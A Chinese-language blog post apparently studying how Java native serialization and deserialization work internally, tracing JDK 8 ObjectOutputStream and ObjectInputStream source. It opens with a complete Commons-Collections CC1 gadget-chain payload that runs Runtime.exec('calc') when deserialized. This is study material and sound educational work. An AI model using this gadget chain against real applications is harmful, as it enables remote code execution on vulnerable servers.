Java序列化与反序列化流程分析

2021-12-06

分析下原生的Java序列化与反序列化流程，为了尽量覆盖各种情况，需要找一个比较复杂的对象进行调试，这里选择CC1链。没有覆盖到的情况结合文档分析。
先看下CC1的payload，环境是jdk8u65

public class CC1Test
{
    public static void main( String[] args ) throws Exception
    {

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };


        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        HashMap<Object, Object> map = new HashMap<>();
        Map<Object,Object> lazyMap = LazyMap.decorate(map,chainedTransformer);

        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor annotationInvocationdhdlConstructor = c.getDeclaredConstructor(Class.class,Map.class);
        annotationInvocationdhdlConstructor.setAccessible(true);
        InvocationHandler h = (InvocationHandler) annotationInvocationdhdlConstructor.newInstance(Override.class,lazyMap);

        Map mapProxy = (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(), new Class[]{Map.class}, h);

        Object o = annotationInvocationdhdlConstructor.newInstance(Override.class, mapProxy);
        serialize(o);
        unserialize("ser.bin");

    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois= new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }
}

类结构是嵌套的，由外到内是大致是AnnotationInvocationHandler->Proxy->LazyMap->ChainedTransformer->Transformer[]

序列化流程

先看ObjectOutputStream的构造函数

public ObjectOutputStream(OutputStream out) throws IOException {
    verifySubclass();
    bout = new BlockDataOutputStream(out);
    handles = new HandleTable(10, (float) 3.00);
    subs = new ReplaceTable(10, (float) 3.00);
    enableOverride = false;
    writeStreamHeader();
    bout.setBlockDataMode(true);
    if (extendedDebugInfo) {
        debugInfoStack = new DebugTraceInfoStack();
    } else {
        debugInfoStack = null;
    }
}

verifySubclass是当前类是ObjectOutputStream子类是做的校验，基本会忽略。
bout是BlockDataOutputStream输出流，用来真正存放数据的。
handles是一个哈希表，映射对象的引用，用来节约重复的对象的空间。
subs是一个哈希表，映射被替换的对象。
enableOverride默认是false，如果是true则调用writeObjectOverride代替writeObject进行序列化。只有调用ObjectOutputStream无参构造方法时会赋值为true，代表跟原本对象无关了。很少见。
writeStreamHeader写入数据头

protected void writeStreamHeader() throws IOException {
    bout.writeShort(STREAM_MAGIC);//0xaced
    bout.writeShort(STREAM_VERSION);//5
}

其实就是传说中的序列化标志aced0005
然后设置data blcok格式，这是为了兼容性，不重要。
然后跟进ObjectOutputStream#writeObject

public final void writeObject(Object obj) throws IOException {
    if (enableOverride) {
        writeObjectOverride(obj);
        return;
    }
    try {
        writeObject0(obj, false);
    } catch (IOException ex) {
        if (depth == 0) {
            writeFatalException(ex);
        }
        throw ex;
    }
}

如果配置了enableOverride，就调用writeObjectOverride，否则调用writeObject0。基本都是后一种情况，跟进writeObject0，比较长拆开看

private void writeObject0(Object obj, boolean unshared)
    throws IOException
{
    boolean oldMode = bout.setBlockDataMode(false);
    depth++;
    try {
        // handle previously written and non-replaceable objects
        int h;
        if ((obj = subs.lookup(obj)) == null) {
            writeNull();
            return;
        } else if (!unshared && (h = handles.lookup(obj)) != -1) {
            writeHandle(h);
            return;
        } else if (obj instanceof Class) {
            writeClass((Class) obj, unshared);
            return;
        } else if (obj instanceof ObjectStreamClass) {
            writeClassDesc((ObjectStreamClass) obj, unshared);
            return;
        }

如注释里所写，先处理之前写入过的对象(第二个case)和不能替换的对象(第一个case)。然后判断写入对象的类型，如果是class调用writeClass，如果是ObjectStreamClass调用writeClassDesc写入。
当前subs和handles都是空的，obj是一个AnnotationInvocationHandler，所以不会进入这几个case。

// check for replacement object
Object orig = obj;
Class<?> cl = obj.getClass();
ObjectStreamClass desc;
for (;;) {
    // REMIND: skip this check for strings/arrays?
    Class<?> repCl;
    desc = ObjectStreamClass.lookup(cl, true);
    if (!desc.hasWriteReplaceMethod() ||
        (obj = desc.invokeWriteReplace(obj)) == null ||
        (repCl = obj.getClass()) == cl)
    {
        break;
    }
    cl = repCl;
}
if (enableReplace) {
    Object rep = replaceObject(obj);
    if (rep != obj && rep != null) {
        cl = rep.getClass();
        desc = ObjectStreamClass.lookup(cl, true);
    }
    obj = rep;
}

// if object replaced, run through original checks a second time
if (obj != orig) {
    subs.assign(orig, obj);
    if (obj == null) {
        writeNull();
        return;
    } else if (!unshared && (h = handles.lookup(obj)) != -1) {
        writeHandle(h);
        return;
    } else if (obj instanceof Class) {
        writeClass((Class) obj, unshared);
        return;
    } else if (obj instanceof ObjectStreamClass) {
        writeClassDesc((ObjectStreamClass) obj, unshared);
        return;
    }
}

然后处理替换的对象，首先会获取一个ObjectStreamClass，这就是类的描述符，里面记录了这个类和序列化有关的属性，比如是不是动态代理，能不能序列化，能不能外部化，是不是重写了writeObject、readObject等等。如果这个类定义了一个叫writeReplace的方法，就会调用重写的writeReplace将obj和cl替换为对应返回值。
然后如果开启了enableReplace，会调用replaceObject，并将obj和cl替换为对应的返回值。
这两个替换其实很像，不太清楚为什么要有两个。硬说区别的话，writeReplace只要定义了就会调用，而replaceObject需要调用enableReplaceObject开启enableReplace才可以。总之都很少用到。
最后，如果对象被替换过了，重新做一遍前面的判断。

        // remaining cases
        if (obj instanceof String) {
            writeString((String) obj, unshared);
        } else if (cl.isArray()) {
            writeArray(obj, desc, unshared);
        } else if (obj instanceof Enum) {
            writeEnum((Enum<?>) obj, desc, unshared);
        } else if (obj instanceof Serializable) {
            writeOrdinaryObject(obj, desc, unshared);
        } else {
            if (extendedDebugInfo) {
                throw new NotSerializableException(
                    cl.getName() + "\n" + debugInfoStack.toString());
            } else {
                throw new NotSerializableException(cl.getName());
            }
        }
    } finally {
        depth--;
        bout.setBlockDataMode(oldMode);
    }
}

处理完替换对象相关的判断，来到真正的序列化部分，这里判断obj的类型，对于String、Array、Enum这几种类型有特殊的序列化方法。除此之外都会进入writeOrdinaryObject中。当然如果没有继承Serializable会抛NotSerializableException异常

private void writeOrdinaryObject(Object obj,
                                 ObjectStreamClass desc,
                                 boolean unshared)
    throws IOException
{
    if (extendedDebugInfo) {
        debugInfoStack.push(
            (depth == 1 ? "root " : "") + "object (class \"" +
            obj.getClass().getName() + "\", " + obj.toString() + ")");
    }
    try {
        desc.checkSerialize();

        bout.writeByte(TC_OBJECT);
        writeClassDesc(desc, false);
        handles.assign(unshared ? null : obj);
        if (desc.isExternalizable() && !desc.isProxy()) {
            writeExternalData((Externalizable) obj);
        } else {
            writeSerialData(obj, desc);
        }
    } finally {
        if (extendedDebugInfo) {
            debugInfoStack.pop();
        }
    }
}

这里是写入一般对象的逻辑:
1、首先写一个字节标识0x73代表该对象是Object
2、然后调用writeClassDesc写入类描述符
3、之后调用handles.assign也就是代表这个对象已经序列化过，后续再序列化的话只需要保存引用就可以。
4、之后写入对象具体数据，根据类是否可以外部化调用writeExternalData或writeSerialData，实际上就是调用writeExternal或writeObject。
先看writeClassDesc

private void writeClassDesc(ObjectStreamClass desc, boolean unshared)
    throws IOException
{
    int handle;
    if (desc == null) {
        writeNull();
    } else if (!unshared && (handle = handles.lookup(desc)) != -1) {
        writeHandle(handle);
    } else if (desc.isProxy()) {
        writeProxyDesc(desc, unshared);
    } else {
        writeNonProxyDesc(desc, unshared);
    }
}

如果类描述符是null就写入null，如果之前写入过这个类描述符就writeHandle写引用来代替。如果是动态代理就调用writeProxyDesc，不是就调用writeNonProxyDesc。那么当前实际会进入writeNonProxyDesc，因为当前的AnnotationInvocationHandler并不是动态代理。

private void writeNonProxyDesc(ObjectStreamClass desc, boolean unshared)
    throws IOException
{
    bout.writeByte(TC_CLASSDESC);
    handles.assign(unshared ? null : desc);

    if (protocol == PROTOCOL_VERSION_1) {
        // do not invoke class descriptor write hook with old protocol
        desc.writeNonProxy(this);
    } else {
        writeClassDescriptor(desc);
    }

    Class<?> cl = desc.forClass();
    bout.setBlockDataMode(true);
    if (cl != null && isCustomSubclass()) {
        ReflectUtil.checkPackageAccess(cl);
    }
    annotateClass(cl);
    bout.setBlockDataMode(false);
    bout.writeByte(TC_ENDBLOCKDATA);

    writeClassDesc(desc.getSuperDesc(), false);
}

首先写一个字节TC_CLASSDESC(0x72)代表写入的是类描述符，然后向handles里保存当前类描述符，然后根据序列化协议调用ObjectStreamClass#writeNonProxy或writeClassDescriptor，目前协议版本都是2了，调用writeClassDescriptor

protected void writeClassDescriptor(ObjectStreamClass desc)
    throws IOException
{
    desc.writeNonProxy(this);
}

实际上是一样的。都是ObjectStreamClass#writeNonProxy

void writeNonProxy(ObjectOutputStream out) throws IOException {
    out.writeUTF(name);
    out.writeLong(getSerialVersionUID());

    byte flags = 0;
    if (externalizable) {
        flags |= ObjectStreamConstants.SC_EXTERNALIZABLE;
        int protocol = out.getProtocolVersion();
        if (protocol != ObjectStreamConstants.PROTOCOL_VERSION_1) {
            flags |= ObjectStreamConstants.SC_BLOCK_DATA;
        }
    } else if (serializable) {
        flags |= ObjectStreamConstants.SC_SERIALIZABLE;
    }
    if (hasWriteObjectData) {
        flags |= ObjectStreamConstants.SC_WRITE_METHOD;
    }
    if (isEnum) {
        flags |= ObjectStreamConstants.SC_ENUM;
    }
    out.writeByte(flags);

    out.writeShort(fields.length);
    for (int i = 0; i < fields.length; i++) {
        ObjectStreamField f = fields[i];
        out.writeByte(f.getTypeCode());
        out.writeUTF(f.getName());
        if (!f.isPrimitive()) {
            out.writeTypeString(f.getTypeString());
        }
    }
}

写入类名，写入SerialVersionUID，写入标志位，写入字段数量，然后和循环写入字段的类型和名字。比如当前类有两个字段，第一个是memberValues，分别写入L、memberValues、Ljava/util/Map; 第二个是type，写入L、type、Ljava/lang/Class;
之后返回writeNonProxyDesc，调用annotateClass，默认是空函数，可以重写这个方法，在写入类描述符之后再写一些信息。如果这么做的话，对应的在反序列化时需要重写resolveClass来处理。一般不会调用，然后写TC_ENDBLOCKDATA标识符，然后调用又writeClassDesc写入父类的标识符，递归的感觉。当前desc就是null了，因为父类Object不能序列化。
回到writeOrdinaryObject调用writeSerialData

private void writeSerialData(Object obj, ObjectStreamClass desc)
    throws IOException
{
    ObjectStreamClass.ClassDataSlot[] slots = desc.getClassDataLayout();
    for (int i = 0; i < slots.length; i++) {
        ObjectStreamClass slotDesc = slots[i].desc;
        if (slotDesc.hasWriteObjectMethod()) {
            PutFieldImpl oldPut = curPut;
            curPut = null;
            SerialCallbackContext oldContext = curContext;

            if (extendedDebugInfo) {
                debugInfoStack.push(
                    "custom writeObject data (class \"" +
                    slotDesc.getName() + "\")");
            }
            try {
                curContext = new SerialCallbackContext(obj, slotDesc);
                bout.setBlockDataMode(true);
                slotDesc.invokeWriteObject(obj, this);
                bout.setBlockDataMode(false);
                bout.writeByte(TC_ENDBLOCKDATA);
            } finally {
                curContext.setUsed();
                curContext = oldContext;
                if (extendedDebugInfo) {
                    debugInfoStack.pop();
                }
            }

            curPut = oldPut;
        } else {
            defaultWriteFields(obj, slotDesc);
        }
    }
}

其实就是重写writeObject的话就调writeObject，不然就调defaultWriteFields

private void defaultWriteFields(Object obj, ObjectStreamClass desc)
    throws IOException
{
    Class<?> cl = desc.forClass();
    if (cl != null && obj != null && !cl.isInstance(obj)) {
        throw new ClassCastException();
    }

    desc.checkDefaultSerialize();

    int primDataSize = desc.getPrimDataSize();
    if (primVals == null || primVals.length < primDataSize) {
        primVals = new byte[primDataSize];
    }
    desc.getPrimFieldValues(obj, primVals);
    bout.write(primVals, 0, primDataSize, false);

    ObjectStreamField[] fields = desc.getFields(false);
    Object[] objVals = new Object[desc.getNumObjFields()];
    int numPrimFields = fields.length - objVals.length;
    desc.getObjFieldValues(obj, objVals);
    for (int i = 0; i < objVals.length; i++) {
        if (extendedDebugInfo) {
            debugInfoStack.push(
                "field (class \"" + desc.getName() + "\", name: \"" +
                fields[numPrimFields + i].getName() + "\", type: \"" +
                fields[numPrimFields + i].getType() + "\")");
        }
        try {
            writeObject0(objVals[i],
                         fields[numPrimFields + i].isUnshared());
        } finally {
            if (extendedDebugInfo) {
                debugInfoStack.pop();
            }
        }
    }
}

首先获取类里所有prim的字段，也就是基础属性，包括boolean、byte、char、short、int、float、long、double这些，然后直接写入流。
之后获取非基础字段，循环调用writeObject0。
所以实际上java原生序列化是从外到内递归调用writeObject的，一直写入到所有字段都是基础属性为止。
那么继续跟进，下一层的两个对象分别是一个动态代理和一个Class，那么接下来分析动态代理对象的序列化过程：

对动态代理对象的序列化

前面的部分都一样，在writeClassDesc时会进入到writeProxyDesc分支：

private void writeProxyDesc(ObjectStreamClass desc, boolean unshared)
    throws IOException
{
    bout.writeByte(TC_PROXYCLASSDESC);
    handles.assign(unshared ? null : desc);

    Class<?> cl = desc.forClass();
    Class<?>[] ifaces = cl.getInterfaces();
    bout.writeInt(ifaces.length);
    for (int i = 0; i < ifaces.length; i++) {
        bout.writeUTF(ifaces[i].getName());
    }

    bout.setBlockDataMode(true);
    if (cl != null && isCustomSubclass()) {
        ReflectUtil.checkPackageAccess(cl);
    }
    annotateProxyClass(cl);
    bout.setBlockDataMode(false);
    bout.writeByte(TC_ENDBLOCKDATA);

    writeClassDesc(desc.getSuperDesc(), false);
}

这里循环写入的是接口的名字，也就是java.util.Map。然后调用annotateProxyClass，一般也是空方法，之后一样调用writeClassDesc(desc.getSuperDesc(), false)，这里父类描述符是Proxy类的描述符，会调用writeNonProxyDesc，因为它自己并不是代理类。和最外层一样这里就不跟了。
然后又到writeSerialData，这个动态代理类只有一个字段，值是一个AnnotationIvocationHandler，那么下一层就是序列化这个对象。
虽然这个AnnotationIvocationHandler和最外层的不是一个对象，但它们是同一个类，因此为了节省空间会用引用代替。
在writeClassDesc时会调用writeHandle

private void writeHandle(int handle) throws IOException {
    bout.writeByte(TC_REFERENCE);
    bout.writeInt(baseWireHandle + handle);
}

用一个int来代替原来的好几个字符串。
然后继续下一层序列化，这时写入的是LazyMap和Override.Class。序列化LazyMap时前面都差不多，但在writeSerialData时会触发自身的writeObject

private void writeObject(ObjectOutputStream out) throws IOException {
    out.defaultWriteObject();
    out.writeObject(map);
}

先调用了空的defaultWriteObject又调用了正常的writeObject(map)

public void defaultWriteObject() throws IOException {
    SerialCallbackContext ctx = curContext;
    if (ctx == null) {
        throw new NotActiveException("not in call to writeObject");
    }
    Object curObj = ctx.getObj();
    ObjectStreamClass curDesc = ctx.getDesc();
    bout.setBlockDataMode(false);
    defaultWriteFields(curObj, curDesc);
    bout.setBlockDataMode(true);
}

实际上还是原来的defaultWriteFields(obj, desc)，然后重新调用了一次ObjectOutputStream#writeObject。
下一个对象是ChainedTransformer，没什么特别的，略过。

对数组的序列化

然后是Transformer数组，此时获取到desc是[Lorg.apache.commons.collections.Transformer;
在writeObject0中进入到writeArray

private void writeArray(Object array,
                        ObjectStreamClass desc,
                        boolean unshared)
    throws IOException
{
    bout.writeByte(TC_ARRAY);
    writeClassDesc(desc, false);
    handles.assign(unshared ? null : array);

    Class<?> ccl = desc.forClass().getComponentType();
    if (ccl.isPrimitive()) {
        ......
    } else {
        Object[] objs = (Object[]) array;
        int len = objs.length;
        bout.writeInt(len);
        if (extendedDebugInfo) {
            debugInfoStack.push(
                "array (class \"" + array.getClass().getName() +
                "\", size: " + len  + ")");
        }
        try {
            for (int i = 0; i < len; i++) {
                if (extendedDebugInfo) {
                    debugInfoStack.push(
                        "element of array (index: " + i + ")");
                }
                try {
                    writeObject0(objs[i], false);
                } finally {
                    if (extendedDebugInfo) {
                        debugInfoStack.pop();
                    }
                }
            }
        } finally {
            if (extendedDebugInfo) {
                debugInfoStack.pop();
            }
        }
    }
}

如果是prim类型就直接写，不是的话继续对数组里每个成员writeObject0。下一个就是ConstantTransformer，之后是其中的Runtime.class

对Class的序列化

对Class直接调用writeClass然后return，因为其中没有需要序列化传递的属性值。

private void writeClass(Class<?> cl, boolean unshared) throws IOException {
    bout.writeByte(TC_CLASS);
    writeClassDesc(ObjectStreamClass.lookup(cl, true), false);
    handles.assign(unshared ? null : cl);
}

对String的序列化

序列化InvokerTransformer最后会获取到字符串内容，也就是getRuntime，此时调用writeString对字符串序列化

private void writeString(String str, boolean unshared) throws IOException {
    handles.assign(unshared ? null : str);
    long utflen = bout.getUTFLength(str);
    if (utflen <= 0xFFFF) {
        bout.writeByte(TC_STRING);
        bout.writeUTF(str, utflen);
    } else {
        bout.writeByte(TC_LONGSTRING);
        bout.writeLongUTF(str, utflen);
    }
}

实际上序列化过程都是大同小异的，基本都是写标识符、写类描述、字段名、内容。

反序列化流程

构造函数是类似的

public ObjectInputStream(InputStream in) throws IOException {
    verifySubclass();
    bin = new BlockDataInputStream(in);
    handles = new HandleTable(10);
    vlist = new ValidationList();
    enableOverride = false;
    readStreamHeader();
    bin.setBlockDataMode(true);
}

看readObject，先看前半部分

public final Object readObject()
    throws IOException, ClassNotFoundException
{
    if (enableOverride) {
        return readObjectOverride();
    }

    // if nested read, passHandle contains handle of enclosing object
    int outerHandle = passHandle;
    try {
        Object obj = readObject0(false);
        handles.markDependency(outerHandle, passHandle);

同样判断override，然后调用readObject0，还有些对于嵌套反序列化的处理，不是很重要。
重点看readObject0

private Object readObject0(boolean unshared) throws IOException {
    ......
    byte tc;
    while ((tc = bin.peekByte()) == TC_RESET) {
        bin.readByte();
        handleReset();
    }

    depth++;
    try {
        switch (tc) {
            case TC_NULL:
                return readNull();

            case TC_REFERENCE:
                return readHandle(unshared);

            case TC_CLASS:
                return readClass(unshared);

            case TC_CLASSDESC:
            case TC_PROXYCLASSDESC:
                return readClassDesc(unshared);

            case TC_STRING:
            case TC_LONGSTRING:
                return checkResolve(readString(unshared));

            case TC_ARRAY:
                return checkResolve(readArray(unshared));

            case TC_ENUM:
                return checkResolve(readEnum(unshared));

            case TC_OBJECT:
                return checkResolve(readOrdinaryObject(unshared));

            case TC_EXCEPTION:
                IOException ex = readFatalException();
                throw new WriteAbortedException("writing aborted", ex);

            case TC_BLOCKDATA:
            case TC_BLOCKDATALONG:
                if (oldMode) {
                    bin.setBlockDataMode(true);
                    bin.peek();             // force header read
                    throw new OptionalDataException(
                        bin.currentBlockRemaining());
                } else {
                    throw new StreamCorruptedException(
                        "unexpected block data");
                }

            case TC_ENDBLOCKDATA:
                if (oldMode) {
                    throw new OptionalDataException(true);
                } else {
                    throw new StreamCorruptedException(
                        "unexpected end of block data");
                }

            default:
                throw new StreamCorruptedException(
                    String.format("invalid type code: %02X", tc));
        }
    } finally {
        depth--;
        bin.setBlockDataMode(oldMode);
    }
}

其实就是根据读取的标识符调用对应的方法，当前是TC_OBJECT，调用checkResolve(readOrdinaryObject(unshared))
看readOrdinaryObject，内容比较多，分开看

private Object readOrdinaryObject(boolean unshared)
    throws IOException
{
    if (bin.readByte() != TC_OBJECT) {
        throw new InternalError();
    }

    ObjectStreamClass desc = readClassDesc(false);
    desc.checkDeserialize();

    Class<?> cl = desc.forClass();
    if (cl == String.class || cl == Class.class
            || cl == ObjectStreamClass.class) {
        throw new InvalidClassException("invalid class descriptor");
    }

首先读取类描述符，判断类型

private ObjectStreamClass readClassDesc(boolean unshared)
    throws IOException
{
    byte tc = bin.peekByte();
    switch (tc) {
        case TC_NULL:
            return (ObjectStreamClass) readNull();

        case TC_REFERENCE:
            return (ObjectStreamClass) readHandle(unshared);

        case TC_PROXYCLASSDESC:
            return readProxyDesc(unshared);

        case TC_CLASSDESC:
            return readNonProxyDesc(unshared);

        default:
            throw new StreamCorruptedException(
                String.format("invalid type code: %02X", tc));
    }
}

当前调用readNonProxyDesc

private ObjectStreamClass readNonProxyDesc(boolean unshared)
    throws IOException
{
    if (bin.readByte() != TC_CLASSDESC) {
        throw new InternalError();
    }

    ObjectStreamClass desc = new ObjectStreamClass();
    int descHandle = handles.assign(unshared ? unsharedMarker : desc);
    passHandle = NULL_HANDLE;

    ObjectStreamClass readDesc = null;
    try {
        readDesc = readClassDescriptor();
    } catch (ClassNotFoundException ex) {
        throw (IOException) new InvalidClassException(
            "failed to read class descriptor").initCause(ex);
    }

    Class<?> cl = null;
    ClassNotFoundException resolveEx = null;
    bin.setBlockDataMode(true);
    final boolean checksRequired = isCustomSubclass();
    try {
        if ((cl = resolveClass(readDesc)) == null) {
            resolveEx = new ClassNotFoundException("null class");
        } else if (checksRequired) {
            ReflectUtil.checkPackageAccess(cl);
        }
    } catch (ClassNotFoundException ex) {
        resolveEx = ex;
    }
    skipCustomData();

    desc.initNonProxy(readDesc, cl, resolveEx, readClassDesc(false));

    handles.finish(descHandle);
    passHandle = descHandle;
    return desc;
}

readClassDescriptor和序列化时候是对应的，就是读取字段，不细说了。之后注意会调用cl = resolveClass(readDesc)来获取反序列化对象的Class

protected Class<?> resolveClass(ObjectStreamClass desc)
    throws IOException, ClassNotFoundException
{
    String name = desc.getName();
    try {
        return Class.forName(name, false, latestUserDefinedLoader());
    } catch (ClassNotFoundException ex) {
        Class<?> cl = primClasses.get(name);
        if (cl != null) {
            return cl;
        } else {
            throw ex;
        }
    }
}

默认是通过Class.forName直接加载的，但有些时候会重写resolveClass，比如shiro。resolveClass和序列化时的annotateClass是对应的，也可以在里面写一些关于类加载的逻辑，比如反序列化黑名单。
然后调用skipCustomData，一般就是读取一个结束标志位。也有可能在里面嵌套反序列化。
然后是desc.initNonProxy，功能是初始化类描述符，判断是否重写了readObject之类的。
回到readOrdinaryObject里

Object obj;
try {
    obj = desc.isInstantiable() ? desc.newInstance() : null;
} catch (Exception ex) {
    throw (IOException) new InvalidClassException(
        desc.forClass().getName(),
        "unable to create instance").initCause(ex);
}

passHandle = handles.assign(unshared ? unsharedMarker : obj);
ClassNotFoundException resolveEx = desc.getResolveException();
if (resolveEx != null) {
    handles.markException(passHandle, resolveEx);
}

这里通过desc.newInstance()获取了一个obj

 /**
 * Creates a new instance of the represented class.  If the class is
 * externalizable, invokes its public no-arg constructor; otherwise, if the
 * class is serializable, invokes the no-arg constructor of the first
 * non-serializable superclass.  Throws UnsupportedOperationException if
 * this class descriptor is not associated with a class, if the associated
 * class is non-serializable or if the appropriate no-arg constructor is
 * inaccessible/unavailable.
 */
Object newInstance()
    throws InstantiationException, InvocationTargetException,
           UnsupportedOperationException
{
    requireInitialized();
    if (cons != null) {
        try {
            return cons.newInstance();
        } catch (IllegalAccessException ex) {
            // should not occur, as access checks have been suppressed
            throw new InternalError(ex);
        }
    } else {
        throw new UnsupportedOperationException();
    }
}

注释写的是：如果是externalizable的类，就调用自己的public无参构造方法；如果是serializable的类，调用第一个不能序列化的父类的无参构造方法。那对于当前的AnnotationInvocationHandler来说就是Object类。Object是没有显示定义构造方法的，Java里没有定义的话默认就是有一个无参构造。
所以很容易会认为调用的是Object的无参构造方法，但这样就很奇怪，调用Object的构造方法怎么可能生成一个AnnotationInvocationHandler对象呢？
跟了一下，发现是jdk专门为反序列化做了些特殊处理，在ObjectStreamClass的构造函数里

private ObjectStreamClass(final Class<?> cl) {
    this.cl = cl;
    name = cl.getName();
    isProxy = Proxy.isProxyClass(cl);
    isEnum = Enum.class.isAssignableFrom(cl);
    serializable = Serializable.class.isAssignableFrom(cl);
    externalizable = Externalizable.class.isAssignableFrom(cl);

    Class<?> superCl = cl.getSuperclass();
    superDesc = (superCl != null) ? lookup(superCl, false) : null;
    localDesc = this;

    if (serializable) {
        AccessController.doPrivileged(new PrivilegedAction<Void>() {
            public Void run() {
                if (isEnum) {
                    suid = Long.valueOf(0);
                    fields = NO_FIELDS;
                    return null;
                }
                if (cl.isArray()) {
                    fields = NO_FIELDS;
                    return null;
                }

                suid = getDeclaredSUID(cl);
                try {
                    fields = getSerialFields(cl);
                    computeFieldOffsets();
                } catch (InvalidClassException e) {
                    serializeEx = deserializeEx =
                        new ExceptionInfo(e.classname, e.getMessage());
                    fields = NO_FIELDS;
                }

                if (externalizable) {
                    cons = getExternalizableConstructor(cl);
                } else {
                    cons = getSerializableConstructor(cl);
                    writeObjectMethod = getPrivateMethod(cl, "writeObject",
                        new Class<?>[] { ObjectOutputStream.class },
                        Void.TYPE);
                    readObjectMethod = getPrivateMethod(cl, "readObject",
                        new Class<?>[] { ObjectInputStream.class },
                        Void.TYPE);
                    readObjectNoDataMethod = getPrivateMethod(
                        cl, "readObjectNoData", null, Void.TYPE);
                    hasWriteObjectData = (writeObjectMethod != null);
                }
                writeReplaceMethod = getInheritableMethod(
                    cl, "writeReplace", null, Object.class);
                readResolveMethod = getInheritableMethod(
                    cl, "readResolve", null, Object.class);
                return null;
            }
        });
    } else {
        suid = Long.valueOf(0);
        fields = NO_FIELDS;
    }

    try {
        fieldRefl = getReflector(fields, this);
    } catch (InvalidClassException ex) {
        // field mismatches impossible when matching local fields vs. self
        throw new InternalError(ex);
    }

    if (deserializeEx == null) {
        if (isEnum) {
            deserializeEx = new ExceptionInfo(name, "enum type");
        } else if (cons == null) {
            deserializeEx = new ExceptionInfo(name, "no valid constructor");
        }
    }
    for (int i = 0; i < fields.length; i++) {
        if (fields[i].getField() == null) {
            defaultSerializeEx = new ExceptionInfo(
                name, "unmatched serializable field(s) declared");
        }
    }
    initialized = true;
}

cons赋值是这么一句cons = getSerializableConstructor(cl)

private static Constructor<?> getSerializableConstructor(Class<?> cl) {
    Class<?> initCl = cl;
    while (Serializable.class.isAssignableFrom(initCl)) {
        if ((initCl = initCl.getSuperclass()) == null) {
            return null;
        }
    }
    try {
        Constructor<?> cons = initCl.getDeclaredConstructor((Class<?>[]) null);
        int mods = cons.getModifiers();
        if ((mods & Modifier.PRIVATE) != 0 ||
            ((mods & (Modifier.PUBLIC | Modifier.PROTECTED)) == 0 &&
             !packageEquals(cl, initCl)))
        {
            return null;
        }
        cons = reflFactory.newConstructorForSerialization(cl, cons);
        cons.setAccessible(true);
        return cons;
    } catch (NoSuchMethodException ex) {
        return null;
    }
}

调用了reflFactory.newConstructorForSerialization。这里用到了ReflectionFactory这个类，这是非常底层的一个类，用来实现某些特殊的反射功能，比如不调用构造方法创建对象。很多功能都是通过修改asm字节码的方式实现的，不细看了。newConstructorForSerialization这个方法的作用可以理解为利用一个构造方法来创建一个新的构造方法，这里相当于基于Object的构造方法生成了一个AnnotationInvocationHandler的构造方法，调用cons.newInstance时调用了Object的构造方法，但返回的是一个AnnotationInvocationHandler对象。
总之就是这样实现的，可以自己写个demo试下。尽量理解一下这样做的意义，先创建一个对应类的空对象，然后再赋值，大概是这样。
接着回到readOrdinaryObject

if (desc.isExternalizable()) {
    readExternalData((Externalizable) obj, desc);
} else {
    readSerialData(obj, desc);
}
handles.finish(passHandle);

接下来读取数据，还是根据externalizable和serializable区分，这里调用readSerialData

private void readSerialData(Object obj, ObjectStreamClass desc)
    throws IOException
{
    ObjectStreamClass.ClassDataSlot[] slots = desc.getClassDataLayout();
    for (int i = 0; i < slots.length; i++) {
        ObjectStreamClass slotDesc = slots[i].desc;

        if (slots[i].hasData) {
            if (obj == null || handles.lookupException(passHandle) != null) {
                defaultReadFields(null, slotDesc); // skip field values
            } else if (slotDesc.hasReadObjectMethod()) {
                SerialCallbackContext oldContext = curContext;
                if (oldContext != null)
                    oldContext.check();
                try {
                    curContext = new SerialCallbackContext(obj, slotDesc);

                    bin.setBlockDataMode(true);
                    slotDesc.invokeReadObject(obj, this);
                } catch (ClassNotFoundException ex) {
                    /*
                     * In most cases, the handle table has already
                     * propagated a CNFException to passHandle at this
                     * point; this mark call is included to address cases
                     * where the custom readObject method has cons'ed and
                     * thrown a new CNFException of its own.
                     */
                    handles.markException(passHandle, ex);
                } finally {
                    curContext.setUsed();
                    if (oldContext!= null)
                        oldContext.check();
                    curContext = oldContext;
                }

                /*
                 * defaultDataEnd may have been set indirectly by custom
                 * readObject() method when calling defaultReadObject() or
                 * readFields(); clear it to restore normal read behavior.
                 */
                defaultDataEnd = false;
            } else {
                defaultReadFields(obj, slotDesc);
            }

            if (slotDesc.hasWriteObjectData()) {
                skipCustomData();
            } else {
                bin.setBlockDataMode(false);
            }
        } else {
            if (obj != null &&
                slotDesc.hasReadObjectNoDataMethod() &&
                handles.lookupException(passHandle) == null)
            {
                slotDesc.invokeReadObjectNoData(obj);
            }
        }
    }
}

和序列化的时候差不多，判断是否重写了readObject，有就调用，没有就调用默认的defaultReadFields。这里还有个case会调用readObjectNoData，很少见，一般是在序列化和反序列化的类版本不同时调用，不细分析了。
进入AnnotationInvocationHandler#readObject，先调用ObjectInputStream#defaultReadObject，然后还是会调用defaultReadFields

private void defaultReadFields(Object obj, ObjectStreamClass desc)
    throws IOException
{
    Class<?> cl = desc.forClass();
    if (cl != null && obj != null && !cl.isInstance(obj)) {
        throw new ClassCastException();
    }

    int primDataSize = desc.getPrimDataSize();
    if (primVals == null || primVals.length < primDataSize) {
        primVals = new byte[primDataSize];
    }
    bin.readFully(primVals, 0, primDataSize, false);
    if (obj != null) {
        desc.setPrimFieldValues(obj, primVals);
    }

    int objHandle = passHandle;
    ObjectStreamField[] fields = desc.getFields(false);
    Object[] objVals = new Object[desc.getNumObjFields()];
    int numPrimFields = fields.length - objVals.length;
    for (int i = 0; i < objVals.length; i++) {
        ObjectStreamField f = fields[numPrimFields + i];
        objVals[i] = readObject0(f.isUnshared());
        if (f.getField() != null) {
            handles.markDependency(objHandle, passHandle);
        }
    }
    if (obj != null) {
        desc.setObjFieldValues(obj, objVals);
    }
    passHandle = objHandle;
}

